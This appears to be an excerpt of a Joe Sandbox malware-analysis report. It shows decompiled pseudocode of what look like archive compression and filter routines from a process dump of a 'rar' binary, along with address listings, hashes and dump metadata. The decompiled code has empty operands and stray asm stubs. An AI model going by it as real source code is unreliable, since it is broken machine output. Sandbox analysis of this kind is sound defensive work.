				_t239 = ( >=  ? 0 : r8d) - 0xfffffffffffffffe;
				if (_t277 == 0) goto 0x50b484d9;
				_t240 = ( >=  ? 0 : r8d) - 0xfffffffffffffffd;
				if (_t277 == 0) goto 0x50b484cc;
				_t278 = ( >=  ? 0 : r8d) - 0xfffffffffffffffd - 1;
				if (( >=  ? 0 : r8d) - 0xfffffffffffffffd != 1) goto 0x50b48512;
				if (0 - 0x10 >= 0) goto 0x50b48512;
				goto 0x50b48512;
				_t59 = _t317 - 1; // -1
				_t160 =  <  ? 1 : _t59;
				_t195 =  <  ? 1 : _t59;
				goto 0x50b48512;
				_t60 = _t352 + 1; // 0x1
				_t162 =  >=  ? r10d : _t60;
				goto 0x50b484f3;
				_t61 = _t352 - 1; // -1
				_t164 =  <  ? r10d : _t61;
				r10d =  <  ? r10d : _t61;
				goto 0x50b48512;
				_t62 = _t353 + 1; // 0x1
				_t166 =  >=  ? r11d : _t62;
				r11d =  >=  ? r11d : _t62;
				goto 0x50b48512;
				if (r11d - 0xfffffff0 < 0) goto 0x50b48512;
				r11d = r11d - 1;
				r12d = r12d + _t259;
				r15d = _v112;
				_t241 = _v116;
				if (r12d - r14d < 0) goto 0x50b4839a;
				_t255 = _v120 + 1;
				_v120 = _t255;
				if (_t255 - _t259 < 0) goto 0x50b48363;
				goto 0x50b487e6;
				r11d =  *(__rcx + 0x18);
				r13d =  *(__rcx + 8);
				if (__r11 - 3 - 0x1fffd > 0) goto 0x50b487ea;
				if (_t355 - 3 - r11d > 0) goto 0x50b487ea;
				r10d =  *(__rcx + 0xc);
				_v112 = r10d;
				if (r10d - 2 > 0) goto 0x50b487ea;
				_t340 =  *((intOrPtr*)(__rcx));
				r10d = _t355 - 3;
				_t351 = _t340 + __r11;
				r8d = 0;
				if (0 - r11d >= 0) goto 0x50b48604;
				if (0 - r13d < 0) goto 0x50b485ee;
				_t324 = _v96 - _t315;
				r12d =  *(_t324 + _t351) & 0x000000ff;
				_t216 =  *(_t324 + _t351 - 3) & 0x000000ff;
				_v120 = _t216;
				_t217 = _t315 + __r8;
				asm("cdq");
				r14d = r12d - _t216;
				r14d = r14d ^ _t241;
				r14d = r14d - _t241;
				asm("cdq");
				r15d = _t217 - r12d;
				r15d = r15d ^ _t241;
				r15d = r15d - _t241;
				asm("cdq");
				if (r14d - r15d > 0) goto 0x50b485e1;
				if (r14d - (_t217 - _v120 ^ _t241) - _t241 <= 0) goto 0x50b485ec;
				r8d = _v120;
				r8d =  <=  ? r12d : r8d;
				r8b = r8b -  *_t340;
				r8d = r8b & 0xffffffff;
				 *(_t324 + _t351) = r8b;
				if (3 - r11d < 0) goto 0x50b48590;
				if (1 - 3 < 0) goto 0x50b48586;
				r10d = _v112;
				r11d = r11d + 0xfffffffe;
				goto 0x50b48634;
				r8d = __r10 + 2;
				_t242 =  *((intOrPtr*)(_t315 + _t351));
				 *((intOrPtr*)(__r8 + _t351)) =  *((intOrPtr*)(__r8 + _t351)) + _t242;
				 *((intOrPtr*)(_t315 + _t351)) =  *((intOrPtr*)(_t315 + _t351)) + _t242;
				r10d = r10d + 3;
				if (r10d - r11d < 0) goto 0x50b48619;
				goto 0x50b487e6;
				_t336 =  *((intOrPtr*)(__rcx));
				_t180 =  *(__rcx + 0x18) + 0xffffffeb;
				if (_t180 - 0x3ffeb > 0) goto 0x50b487ea;
				if (_t180 == 0) goto 0x50b487e6;
				r15d = _t315 - 1;
				r15d = r15d >> 4;
				r15d = r15d + 1;
				if (( *_t336 & 0x1f) - 0x10 < 0) goto 0x50b4875d;
				_t220 =  *(_t315 + 0x7ff650b971e8) & 0x000000ff;
				_t301 = _t220;
				if (_t301 == 0) goto 0x50b4875d;
				r14d = 0;
				r12d = _t220;
				asm("inc ebp");
				if (_t301 >= 0) goto 0x50b48750;
				r13d = r14d * 0x29;
				r11d =  &(_t355[0x2a]);
				r8d = r11d;
				r11d = r11d & 0x00000007;
				r8d = r8d >> 3;
				r10d = _t336[__r8] & 0x000000ff;
				r8d = r8d + 1;
				r8d = r8d + 1;
				r10d = r10d | (_t336[__r8] & 0x000000ff) << 0x00000008;
				r9d = _t336[_t315] & 0x000000ff;
				r9d = r9d << 8;
				r9d = r9d | _t336[__r8] & 0x000000ff;
				r9d = r9d << 0x10;
				r9d = r9d | r10d;
				r9d = r9d >> r11b;
				r9d = r9d & 0x0000000f;
				if (r9b != 5) goto 0x50b48750;
				r9d =  &(_t355[0x12]);
				_v136 = 0x14;
				r10d =  *(__rdx + _t336) & 0x000000ff;
				r10d = r10d | ( *(__rdx + _t336) & 0x000000ff) << 0x00000008;
				r8d = _t336[_t315] & 0x000000ff;
				_t333 = _t336;
				r8d = r8d << 8;
				r8d = r8d |  *(__rdx + _t336) & 0x000000ff;
				r8d = r8d << 0x10;
				r8d = r8d | r10d;
				r8d = r8d >> (r9d & 0x00000007);
				r8d = r8d - ( *(__rcx + 0x20) >> 4);
				r8d = r8d & 0x000fffff;
				E00007FF67FF650B4881C(_t315, __rcx, __rcx, _t333);
				r14d = r14d + 1;
				_t303 = r14d - 2;
				if (_t303 <= 0) goto 0x50b48694;
				if (_t303 != 0) goto 0x50b4866b;
				goto 0x50b487e6;
				r10d =  *(__rcx + 0x18);
				_t327 =  *((intOrPtr*)(__rcx));
				r10d = r10d + 0xfffffffc;
				r8d =  *(__rcx + 0x20);
				if (r10d - 0x3fffc > 0) goto 0x50b487ea;
				r11b = (r9d >> 3) + 2 == 2;
				r9d = 0;
				r11b = r11b + 0xe8;
				if (r10d == 0) goto 0x50b487e6;
				_t186 =  *_t327;
				r9d = r9d + 1;
				_t328 = _t327 + 1;
				r8d = r8d + 1;
				if (_t186 == 0xe8) goto 0x50b487ae;
				if (_t186 != r11b) goto 0x50b487e1;
				_t248 =  *_t328;
				if (_t248 >= 0) goto 0x50b487c6;
				if ( &(_t333[__r8]) < 0) goto 0x50b487d5;
				 *_t328 =  &(_t333[0x1000000]);
				goto 0x50b487d5;
				if (_t333 - 0x1000000 >= 0) goto 0x50b487d5;
				 *_t328 = _t248 - r8d;
				r9d = r9d + 4;
				r8d = r8d + 4;
				if (r9d - r10d < 0) goto 0x50b4879a;
				goto 0x50b487ec;
				return E00007FF67FF650B69D10(0, r9d & 0x00000007, _v56 ^ _t345);
			}




























































                                                                                                            0x7ff650b48264
                                                                                                            0x7ff650b48264
                                                                                                            0x7ff650b48264
                                                                                                            0x7ff650b48264
                                                                                                            0x7ff650b48269
                                                                                                            0x7ff650b4826e
                                                                                                            0x7ff650b4827f
                                                                                                            0x7ff650b48286
                                                                                                            0x7ff650b4828d
                                                                                                            0x7ff650b48290
                                                                                                            0x7ff650b48294
                                                                                                            0x7ff650b4829c
                                                                                                            0x7ff650b482a5
                                                                                                            0x7ff650b482ae
                                                                                                            0x7ff650b482b7
                                                                                                            0x7ff650b482c0
                                                                                                            0x7ff650b482c5
                                                                                                            0x7ff650b482cb
                                                                                                            0x7ff650b482ce
                                                                                                            0x7ff650b482d1
                                                                                                            0x7ff650b482d5
                                                                                                            0x7ff650b482de
                                                                                                            0x7ff650b482ed
                                                                                                            0x7ff650b482f6
                                                                                                            0x7ff650b482ff
                                                                                                            0x7ff650b48302
                                                                                                            0x7ff650b48307
                                                                                                            0x7ff650b48309
                                                                                                            0x7ff650b4830f
                                                                                                            0x7ff650b48312
                                                                                                            0x7ff650b48316
                                                                                                            0x7ff650b48319
                                                                                                            0x7ff650b4831d
                                                                                                            0x7ff650b48320
                                                                                                            0x7ff650b48328
                                                                                                            0x7ff650b4832a
                                                                                                            0x7ff650b4832f
                                                                                                            0x7ff650b48333
                                                                                                            0x7ff650b48336
                                                                                                            0x7ff650b48339
                                                                                                            0x7ff650b48344
                                                                                                            0x7ff650b48350
                                                                                                            0x7ff650b48358
                                                                                                            0x7ff650b4835d
                                                                                                            0x7ff650b48363
                                                                                                            0x7ff650b48367
                                                                                                            0x7ff650b4836c
                                                                                                            0x7ff650b48370
                                                                                                            0x7ff650b48373
                                                                                                            0x7ff650b48378
                                                                                                            0x7ff650b4837c
                                                                                                            0x7ff650b4837f
                                                                                                            0x7ff650b48384
                                                                                                            0x7ff650b48387
                                                                                                            0x7ff650b4838a
                                                                                                            0x7ff650b48391
                                                                                                            0x7ff650b4839a
                                                                                                            0x7ff650b4839d
                                                                                                            0x7ff650b483a1
                                                                                                            0x7ff650b483a4
                                                                                                            0x7ff650b483a7
                                                                                                            0x7ff650b483aa
                                                                                                            0x7ff650b483ad
                                                                                                            0x7ff650b483b1
                                                                                                            0x7ff650b483c1
                                                                                                            0x7ff650b483da
                                                                                                            0x7ff650b483df
                                                                                                            0x7ff650b483e2
                                                                                                            0x7ff650b483ee
                                                                                                            0x7ff650b483f5
                                                                                                            0x7ff650b483f9
                                                                                                            0x7ff650b48404
                                                                                                            0x7ff650b48405
                                                                                                            0x7ff650b4840d
                                                                                                            0x7ff650b48410
                                                                                                            0x7ff650b48413
                                                                                                            0x7ff650b48414
                                                                                                            0x7ff650b4841c
                                                                                                            0x7ff650b48420
                                                                                                            0x7ff650b4842a
                                                                                                            0x7ff650b4842f
                                                                                                            0x7ff650b48437
                                                                                                            0x7ff650b4843c
                                                                                                            0x7ff650b48443
                                                                                                            0x7ff650b48448
                                                                                                            0x7ff650b48451
                                                                                                            0x7ff650b48456
                                                                                                            0x7ff650b4845d
                                                                                                            0x7ff650b48462
                                                                                                            0x7ff650b48469
                                                                                                            0x7ff650b48471
                                                                                                            0x7ff650b48475
                                                                                                            0x7ff650b48478
                                                                                                            0x7ff650b48478
                                                                                                            0x7ff650b4847c
                                                                                                            0x7ff650b48485
                                                                                                            0x7ff650b48488
                                                                                                            0x7ff650b4848c
                                                                                                            0x7ff650b48496
                                                                                                            0x7ff650b48498
                                                                                                            0x7ff650b4849c
                                                                                                            0x7ff650b4849f
                                                                                                            0x7ff650b484a3
                                                                                                            0x7ff650b484a5
                                                                                                            0x7ff650b484a8
                                                                                                            0x7ff650b484aa
                                                                                                            0x7ff650b484ad
                                                                                                            0x7ff650b484af
                                                                                                            0x7ff650b484b2
                                                                                                            0x7ff650b484b4
                                                                                                            0x7ff650b484b7
                                                                                                            0x7ff650b484b9
                                                                                                            0x7ff650b484bc
                                                                                                            0x7ff650b484be
                                                                                                            0x7ff650b484c1
                                                                                                            0x7ff650b484c6
                                                                                                            0x7ff650b484ca
                                                                                                            0x7ff650b484cf
                                                                                                            0x7ff650b484d2
                                                                                                            0x7ff650b484d5
                                                                                                            0x7ff650b484d7
                                                                                                            0x7ff650b484dd
                                                                                                            0x7ff650b484e1
                                                                                                            0x7ff650b484e5
                                                                                                            0x7ff650b484eb
                                                                                                            0x7ff650b484ef
                                                                                                            0x7ff650b484f3
                                                                                                            0x7ff650b484f6
                                                                                                            0x7ff650b484fc
                                                                                                            0x7ff650b48500
                                                                                                            0x7ff650b48504
                                                                                                            0x7ff650b48507
                                                                                                            0x7ff650b4850d
                                                                                                            0x7ff650b4850f
                                                                                                            0x7ff650b48516
                                                                                                            0x7ff650b4851e
                                                                                                            0x7ff650b48522
                                                                                                            0x7ff650b48528
                                                                                                            0x7ff650b48531
                                                                                                            0x7ff650b48533
                                                                                                            0x7ff650b48538
                                                                                                            0x7ff650b4853e
                                                                                                            0x7ff650b48543
                                                                                                            0x7ff650b48547
                                                                                                            0x7ff650b48558
                                                                                                            0x7ff650b48561
                                                                                                            0x7ff650b48567
                                                                                                            0x7ff650b4856b
                                                                                                            0x7ff650b48573
                                                                                                            0x7ff650b48579
                                                                                                            0x7ff650b4857c
                                                                                                            0x7ff650b48582
                                                                                                            0x7ff650b48586
                                                                                                            0x7ff650b4858e
                                                                                                            0x7ff650b48595
                                                                                                            0x7ff650b4859a
                                                                                                            0x7ff650b4859d
                                                                                                            0x7ff650b485a2
                                                                                                            0x7ff650b485ad
                                                                                                            0x7ff650b485b0
                                                                                                            0x7ff650b485b4
                                                                                                            0x7ff650b485b5
                                                                                                            0x7ff650b485c0
                                                                                                            0x7ff650b485c3
                                                                                                            0x7ff650b485c6
                                                                                                            0x7ff650b485c7
                                                                                                            0x7ff650b485cc
                                                                                                            0x7ff650b485cf
                                                                                                            0x7ff650b485d2
                                                                                                            0x7ff650b485da
                                                                                                            0x7ff650b485df
                                                                                                            0x7ff650b485e1
                                                                                                            0x7ff650b485e8
                                                                                                            0x7ff650b485ee
                                                                                                            0x7ff650b485f7
                                                                                                            0x7ff650b485fb
                                                                                                            0x7ff650b48602
                                                                                                            0x7ff650b48609
                                                                                                            0x7ff650b4860f
                                                                                                            0x7ff650b48613
                                                                                                            0x7ff650b48617
                                                                                                            0x7ff650b48619
                                                                                                            0x7ff650b48621
                                                                                                            0x7ff650b48625
                                                                                                            0x7ff650b4862c
                                                                                                            0x7ff650b48630
                                                                                                            0x7ff650b48637
                                                                                                            0x7ff650b48639
                                                                                                            0x7ff650b48641
                                                                                                            0x7ff650b48644
                                                                                                            0x7ff650b4864c
                                                                                                            0x7ff650b4865a
                                                                                                            0x7ff650b48660
                                                                                                            0x7ff650b48664
                                                                                                            0x7ff650b48668
                                                                                                            0x7ff650b48674
                                                                                                            0x7ff650b48681
                                                                                                            0x7ff650b48686
                                                                                                            0x7ff650b48688
                                                                                                            0x7ff650b4868e
                                                                                                            0x7ff650b48691
                                                                                                            0x7ff650b48694
                                                                                                            0x7ff650b48698
                                                                                                            0x7ff650b4869e
                                                                                                            0x7ff650b486a2
                                                                                                            0x7ff650b486a6
                                                                                                            0x7ff650b486a9
                                                                                                            0x7ff650b486ad
                                                                                                            0x7ff650b486b1
                                                                                                            0x7ff650b486b6
                                                                                                            0x7ff650b486be
                                                                                                            0x7ff650b486c4
                                                                                                            0x7ff650b486d3
                                                                                                            0x7ff650b486d8
                                                                                                            0x7ff650b486dc
                                                                                                            0x7ff650b486df
                                                                                                            0x7ff650b486e3
                                                                                                            0x7ff650b486e6
                                                                                                            0x7ff650b486e9
                                                                                                            0x7ff650b486f1
                                                                                                            0x7ff650b486f3
                                                                                                            0x7ff650b486f7
                                                                                                            0x7ff650b48705
                                                                                                            0x7ff650b48715
                                                                                                            0x7ff650b4871f
                                                                                                            0x7ff650b48724
                                                                                                            0x7ff650b48727
                                                                                                            0x7ff650b4872b
                                                                                                            0x7ff650b48731
                                                                                                            0x7ff650b48738
                                                                                                            0x7ff650b4873b
                                                                                                            0x7ff650b48741
                                                                                                            0x7ff650b48744
                                                                                                            0x7ff650b4874b
                                                                                                            0x7ff650b48750
                                                                                                            0x7ff650b48753
                                                                                                            0x7ff650b48757
                                                                                                            0x7ff650b48767
                                                                                                            0x7ff650b4876d
                                                                                                            0x7ff650b4876f
                                                                                                            0x7ff650b48773
                                                                                                            0x7ff650b48776
                                                                                                            0x7ff650b4877a
                                                                                                            0x7ff650b48785
                                                                                                            0x7ff650b4878a
                                                                                                            0x7ff650b4878e
                                                                                                            0x7ff650b48791
                                                                                                            0x7ff650b48798
                                                                                                            0x7ff650b4879a
                                                                                                            0x7ff650b4879c
                                                                                                            0x7ff650b4879f
                                                                                                            0x7ff650b487a2
                                                                                                            0x7ff650b487a7
                                                                                                            0x7ff650b487ac
                                                                                                            0x7ff650b487ae
                                                                                                            0x7ff650b487b2
                                                                                                            0x7ff650b487ba
                                                                                                            0x7ff650b487c2
                                                                                                            0x7ff650b487c4
                                                                                                            0x7ff650b487ce
                                                                                                            0x7ff650b487d3
                                                                                                            0x7ff650b487d9
                                                                                                            0x7ff650b487dd
                                                                                                            0x7ff650b487e4
                                                                                                            0x7ff650b487e8
                                                                                                            0x7ff650b48818

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0569d2bc39765ffe5400c496c95c11242cbbbbbe3f7c6efdfcdae0f21837ba4c
                                                                                                            • Instruction ID: 8ac6afd69c2daf9a580f89572c9208db32250e150a1b7161837b90d0bba07546
                                                                                                            • Opcode Fuzzy Hash: 0569d2bc39765ffe5400c496c95c11242cbbbbbe3f7c6efdfcdae0f21837ba4c
                                                                                                            • Instruction Fuzzy Hash: 77F10772F281536BE719CF3885A457C3BA2F756744B295135DA4BE3B94CE3AEA01C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B21008 Relevance: .4, Instructions: 383COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E00007FF67FF650B21008(signed long long __rax, long long __rcx, signed int __rdx, long long _a8, signed int _a16, signed int _a24, signed long long _a32) {
				intOrPtr _v80;
				char _v88;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v140;
				char _v144;
				signed int* _v152;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* _t121;
				signed char _t128;
				signed char _t129;
				signed int _t140;
				signed int _t141;
				void* _t148;
				void* _t149;
				char _t156;
				intOrPtr _t157;
				char _t159;
				intOrPtr _t160;
				void* _t161;
				void* _t163;
				signed char _t164;
				signed char _t165;
				signed char _t168;
				signed int _t170;
				signed char _t171;
				signed char _t172;
				signed char _t178;
				signed char _t194;
				signed char _t208;
				signed int _t209;
				signed int _t244;
				signed int _t249;
				signed int _t250;
				signed int _t254;
				void* _t255;
				signed int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t265;
				signed long long _t295;
				signed long long _t296;
				void* _t321;
				intOrPtr* _t322;
				void* _t325;
				char* _t328;
				void* _t329;
				void* _t335;
				void* _t336;
				void* _t337;
				signed int* _t339;
				signed int* _t341;
				signed int* _t344;
				signed long long _t347;

				_t295 = __rax;
				_a8 = __rcx;
				if ( *((char*)(__rdx + 0x8d0)) != 0) goto 0x50b21034;
				E00007FF67FF650B21648(__rdx, __rdx, _t321, _t325, _t336);
				_t322 =  *((intOrPtr*)(__rdx + 8));
				_t296 = _t322 + _t295 * 8;
				_a32 = _t296;
				if (_t322 - _t296 >= 0) goto 0x50b214f3;
				if ( *_t322 != 0) goto 0x50b210aa;
				_t164 =  *(__rdx + 0x2c);
				r15d =  *(_t296 + __rdx + 0x6f8) & 0x000000ff;
				if (r15d - _t164 > 0) goto 0x50b21078;
				_t165 = _t164 - r15d;
				_t244 =  *(__rdx + 0x40 + _t296 * 4) << _t165 |  *(__rdx + 0x28);
				goto 0x50b2109b;
				r15d = r15d - _t165;
				 *(__rdx + 0x28) = _t244 >> r15d |  *(__rdx + 0x28);
				_t121 = E00007FF67FF650B47154(_t244 >> r15d |  *(__rdx + 0x28), _t296, __rdx, __rdx + 0x18, __rdx, _t296, _t335);
				_t168 = 0x20 - r15d;
				 *(__rdx + 0x28) = _t244 << _t168;
				 *(__rdx + 0x2c) = _t168;
				_t327 = _a32;
				goto 0x50b214e2;
				if (_t121 != 1) goto 0x50b2134d;
				r15d =  *(_t322 + 2) & 0x0000ffff;
				if (r15d - 8 >= 0) goto 0x50b210c4;
				goto 0x50b210dd;
				asm("inc ecx");
				_t249 = (_t296 + __rdx * 4 + 0xfffffffc >> 2) - 1;
				_t170 =  *(_t296 + __rdx + 0x6f8) & 0x000000ff;
				_t337 = __rdx + 0x18;
				r12d =  *(__rdx + 0x40 + _t296 * 4);
				_t339 = _t337 + 0x10;
				_t128 =  *(_t337 + 0x14);
				_v152 = _t339;
				if (_t170 - _t128 > 0) goto 0x50b21110;
				_t129 = _t128 - _t170;
				_t171 = _t129;
				r12d = r12d << _t171;
				r12d = r12d |  *_t339;
				goto 0x50b21135;
				_t172 = _t171 - _t129;
				_a16 = _t172;
				 *_t339 = r12d >> _t172 |  *_t339;
				E00007FF67FF650B47154(r12d >> _t172 |  *_t339, _t296, __rdx, _t337, __rdx, _a32, _t335);
				r12d = r12d << 0x20;
				 *_t339 = r12d;
				 *(_t337 + 0x14) = 0x20;
				if (_t249 == 0) goto 0x50b2119b;
				r14d = 1;
				r14d = r14d << _t249;
				r14d = r14d - 1;
				r14d = r14d & r15d;
				if (_t249 - 0x20 > 0) goto 0x50b21169;
				 *(_t337 + 0x14) = 0x20;
				r14d = r14d << 0x20;
				r12d = r12d | r14d;
				goto 0x50b21198;
				_t344 = _v152;
				_t250 = _t249 - 0x20 - _a16 - _t249;
				 *_t344 = r14d >> _t250 | r12d;
				E00007FF67FF650B47154(r14d >> _t250 | r12d, _t296, __rdx, _t337, __rdx, _a32, _t335);
				r12d = r14d;
				_t178 = 0x20 - _t250;
				_t341 = _t344;
				 *(_t337 + 0x14) = _t178;
				r12d = r12d << _t178;
				 *_t341 = r12d;
				r8d =  *(_t322 + 4);
				_a24 = r8d;
				if (r8d - 4 >= 0) goto 0x50b211b0;
				goto 0x50b211c8;
				asm("inc ecx");
				_t254 = (_t296 + __rdx * 2 >> 1) - 1;
				r15d =  *(__rdx + 0x508 + _t296 * 4);
				_t140 =  *(_t296 + __rdx + 0x82a) & 0x000000ff;
				_t208 =  *(_t337 + 0x14);
				if (_t140 - _t208 > 0) goto 0x50b211ec;
				_t209 = _t208 - _t140;
				r15d = r15d << _t209;
				r15d = r15d |  *_t341;
				goto 0x50b21217;
				_t141 = _t140 - _t209;
				_a16 = _t141;
				 *_t341 = r15d >> _t141 | r12d;
				E00007FF67FF650B47154(r15d >> _t141 | r12d, _t296, __rdx, _t337, __rdx, _a32, _t335);
				r8d = _a24;
				r15d = r15d << 0x20;
				 *_t341 = r15d;
				r9d = r15d;
				 *(_t337 + 0x14) = 0x20;
				if (_t254 - 4 < 0) goto 0x50b212eb;
				_a16 = r8d & 0x0000000f;
				if (_t254 - 4 <= 0) goto 0x50b2129a;
				r8d = r8d >> 4;
				r12d = 1;
				_t255 = _t254 + 0xfffffffc;
				r12d = r12d << _t254;
				r12d = r12d - 1;
				r12d = r12d >> 4;
				r12d = r12d & r8d;
				if (_t255 - 0x20 > 0) goto 0x50b21267;
				r15d = r12d;
				r15d = r15d << 0x20;
				r15d = r15d | r9d;
				goto 0x50b21290;
				_t256 = _t255 - 0x20 - _a16 - _t255;
				 *_t341 = r12d >> _t256 | r15d;
				E00007FF67FF650B47154(r12d >> _t256 | r15d, _t296, __rdx, _t337, __rdx, _t327, _t335);
				r15d = r12d;
				r15d = r15d << 0x20;
				r9d = r15d;
				 *_t341 = r15d;
				 *(_t337 + 0x14) = 0x20;
				r12d =  *(_t296 + __rdx + 0x86a) & 0x000000ff;
				if (r12d - 0x20 > 0) goto 0x50b212bb;
				_t259 =  *(__rdx + 0x608 + _t296 * 4) << 0x00000020 | r9d;
				goto 0x50b212df;
				r12d = r12d - 0x20 - _t256 - r12d;
				 *_t341 = _t259 >> r12d | r15d;
				E00007FF67FF650B47154(_t259 >> r12d | r15d, _t296, __rdx, _t337, __rdx, _t327, _t335);
				_t260 = _t259 << 0x20;
				 *_t341 = _t260;
				 *(_t337 + 0x14) = 0x20;
				goto 0x50b210a1;
				if (_t260 == 0) goto 0x50b210a1;
				r14d = 1;
				r14d = r14d << _t260;
				r14d = r14d - 1;
				r14d = r14d & r8d;
				if (_t260 - 0x20 > 0) goto 0x50b21322;
				 *(_t337 + 0x14) = 0x20;
				r14d = r14d << 0x20;
				r14d = r14d | r9d;
				 *_v152 = r14d;
				goto 0x50b210a1;
				_t261 = _t260 - 0x20 - r12d - _t260;
				 *_v152 = r14d >> _t261 | r15d;
				_t148 = E00007FF67FF650B47154(r14d >> _t261 | r15d, _t296, __rdx, _t337, __rdx, _t327, _t335);
				_t194 = 0x20 - _t261;
				 *(_t337 + 0x14) = _t194;
				r14d = r14d << _t194;
				goto 0x50b2131a;
				if (_t148 != 2) goto 0x50b2136d;
				r8d =  *(__rdx + 0x444);
				_t149 = E00007FF67FF650B472B0( *(__rdx + 0x7f9) & 0x000000ff, __rdx, __rdx + 0x18, _t327);
				goto 0x50b214e6;
				if (_t149 != 3) goto 0x50b21401;
				_t342 = __rdx + 0x18;
				r8d =  *(__rdx + 0x40 + _t296 * 4);
				E00007FF67FF650B472B0( *(_t296 + __rdx + 0x6f8) & 0x000000ff, __rdx, __rdx + 0x18, _t327);
				if (( *(_t322 + 2) & 0x0000ffff) - 8 >= 0) goto 0x50b213a3;
				goto 0x50b213bb;
				asm("bsr eax, edx");
				_t265 = (__rdx + _t296 * 4 + 0xfffffffc >> 2) - 1;
				r8d =  *(__rdx + 0x648 + _t296 * 4);
				E00007FF67FF650B472B0( *(__rdx + __rdx + 0x87a) & 0x000000ff, __rdx, __rdx + 0x18, _t327);
				if (_t265 == 0) goto 0x50b210a1;
				r8d = 1;
				r8d = r8d << _t265;
				r8d = r8d - 1;
				r8d = r8d &  *(_t322 + 2) & 0x0000ffff;
				_t156 = E00007FF67FF650B472B0(_t265, __rdx, _t342, _t327);
				goto 0x50b210a1;
				if (_t156 != 4) goto 0x50b21462;
				_v144 = _t156;
				_t157 = E00007FF67FF650B47004(_t296, __rdx, __rdx + 0x18, __rdx, _t327);
				_v140 =  *((intOrPtr*)(__rdx + 0x38));
				asm("movsd xmm0, [ebp-0x50]");
				asm("movsd [ebp-0x38], xmm0");
				_v112 = _t157;
				E00007FF67FF650B20F10(__rdx, __rdx + 0x8a8,  &_v120, _t335);
				if ( *((char*)(__rdx + 0x8d0)) == 0) goto 0x50b214e6;
				if ( *((intOrPtr*)(__rdx + 0x10)) - 1 <= 0) goto 0x50b214e6;
				_t159 = E00007FF67FF650B21648(__rdx, __rdx, _t322, _t327, _t336);
				 *((char*)(__rdx + 0x8d0)) = 0;
				goto 0x50b214e6;
				if (_t159 != 5) goto 0x50b21497;
				_v104 = _t159;
				_t160 = E00007FF67FF650B47004(_t296, __rdx, __rdx + 0x18, __rdx, _t327);
				_v100 =  *((intOrPtr*)(__rdx + 0x38));
				asm("movsd xmm0, [ebp-0x28]");
				asm("movsd [ebp-0x18], xmm0");
				_v80 = _t160;
				_t161 = E00007FF67FF650B20F10(__rdx, __rdx + 0x8a8,  &_v88, _t335);
				goto 0x50b214e6;
				if (_t161 != 6) goto 0x50b214e6;
				r8d =  *(__rdx + 0x440);
				E00007FF67FF650B472B0( *(__rdx + 0x7f8) & 0x000000ff, __rdx, __rdx + 0x18, _t327);
				_t347 = _a32;
				_t328 = _t322 + 8;
				goto 0x50b214da;
				if ( *_t328 != 7) goto 0x50b214df;
				r8d =  *(_t328 + 4);
				_t329 = _t328 + 8;
				_t163 = E00007FF67FF650B472B0( *(_t328 + 2) & 0x0000ffff, __rdx, __rdx + 0x18, _t329);
				if (_t329 - _t347 < 0) goto 0x50b214bc;
				if (_t322 + 0x10 - _t347 < 0) goto 0x50b2104f;
				return _t163;
			}






























































                                                                                                            0x7ff650b21008
                                                                                                            0x7ff650b21008
                                                                                                            0x7ff650b2102d
                                                                                                            0x7ff650b2102f
                                                                                                            0x7ff650b21034
                                                                                                            0x7ff650b2103b
                                                                                                            0x7ff650b2103f
                                                                                                            0x7ff650b21046
                                                                                                            0x7ff650b21053
                                                                                                            0x7ff650b21059
                                                                                                            0x7ff650b2105c
                                                                                                            0x7ff650b2106c
                                                                                                            0x7ff650b2106e
                                                                                                            0x7ff650b21073
                                                                                                            0x7ff650b21076
                                                                                                            0x7ff650b21078
                                                                                                            0x7ff650b21089
                                                                                                            0x7ff650b2108c
                                                                                                            0x7ff650b21096
                                                                                                            0x7ff650b2109b
                                                                                                            0x7ff650b2109e
                                                                                                            0x7ff650b210a1
                                                                                                            0x7ff650b210a5
                                                                                                            0x7ff650b210ac
                                                                                                            0x7ff650b210b2
                                                                                                            0x7ff650b210be
                                                                                                            0x7ff650b210c2
                                                                                                            0x7ff650b210c4
                                                                                                            0x7ff650b210db
                                                                                                            0x7ff650b210e3
                                                                                                            0x7ff650b210eb
                                                                                                            0x7ff650b210ef
                                                                                                            0x7ff650b210f4
                                                                                                            0x7ff650b210f8
                                                                                                            0x7ff650b210fc
                                                                                                            0x7ff650b21102
                                                                                                            0x7ff650b21104
                                                                                                            0x7ff650b21106
                                                                                                            0x7ff650b21108
                                                                                                            0x7ff650b2110b
                                                                                                            0x7ff650b2110e
                                                                                                            0x7ff650b21110
                                                                                                            0x7ff650b2111a
                                                                                                            0x7ff650b21120
                                                                                                            0x7ff650b21123
                                                                                                            0x7ff650b21132
                                                                                                            0x7ff650b21135
                                                                                                            0x7ff650b21138
                                                                                                            0x7ff650b2113e
